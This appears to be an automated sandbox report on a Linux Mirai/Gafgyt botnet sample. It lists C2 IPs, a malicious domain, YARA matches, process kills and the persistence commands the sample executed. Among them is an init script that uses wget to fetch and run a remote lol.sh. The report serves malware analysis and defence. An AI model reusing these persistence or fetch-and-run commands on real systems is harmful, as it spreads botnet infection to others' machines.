Source: global traffic |
TCP traffic: 91.92.246.113 ports 38241,1,2,3,4,8 |
Source: global traffic |
TCP traffic: 93.123.85.166 ports 38241,1,2,3,4,8 |
Source: global traffic |
TCP traffic: 154.216.17.220 ports 38241,1,2,3,4,8 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.202.35.64 |
Source: x86_32.nn.elf, 5461.1.00000000ffaf4000.00000000ffb15000.rw-.sdmp, x86_32.nn.elf.32.dr, profile.12.dr, inittab.12.dr, bootcmd.12.dr, mybinary.12.dr, custom.service.12.dr |
String found in binary or memory: http://pen.gorillafirewall.su/ |
Source: x86_32.nn.elf, 5461.1.00000000ffaf4000.00000000ffb15000.rw-.sdmp |
String found in binary or memory: http://pen.gorillafirewall.su/lol.sh |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown |
Source: /tmp/x86_32.nn.elf (PID: 5462) |
SIGKILL sent: pid: 792, result: successful |
Source: /tmp/x86_32.nn.elf (PID: 5462) |
SIGKILL sent: pid: 884, result: successful |
Source: /tmp/x86_32.nn.elf (PID: 5462) |
SIGKILL sent: pid: 1944, result: successful |
Source: /tmp/x86_32.nn.elf (PID: 5462) |
SIGKILL sent: pid: 3181, result: successful |
Source: /tmp/x86_32.nn.elf (PID: 5462) |
SIGKILL sent: pid: 3185, result: successful |
Source: /tmp/x86_32.nn.elf (PID: 5462) |
SIGKILL sent: pid: 5469, result: successful |
Source: /tmp/x86_32.nn.elf (PID: 5462) |
SIGKILL sent: pid: 5483, result: successful |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26 |
Source: x86_32.nn.elf, type: SAMPLE |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26 |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16 |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16 |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16 |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16 |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26 |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26 |
Source: 5461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26 |
Source: /tmp/x86_32.nn.elf (PID: 5463) |
Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1" |
Source: /tmp/x86_32.nn.elf (PID: 5468) |
Shell command executed: sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1" |
Source: /tmp/x86_32.nn.elf (PID: 5473) |
Shell command executed: sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1" |
Source: /tmp/x86_32.nn.elf (PID: 5475) |
Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/x86_32.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting x86_32.nn.elf'\n /tmp/x86_32.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping x86_32.nn.elf'\n killall x86_32.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/x86_32.nn.elf" |
Source: /tmp/x86_32.nn.elf (PID: 5476) |
Shell command executed: sh -c "chmod +x /etc/init.d/x86_32.nn.elf >/dev/null 2>&1" |
Source: /tmp/x86_32.nn.elf (PID: 5478) |
Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" |
Source: /tmp/x86_32.nn.elf (PID: 5480) |
Shell command executed: sh -c "ln -s /etc/init.d/x86_32.nn.elf /etc/rc.d/S99x86_32.nn.elf >/dev/null 2>&1" |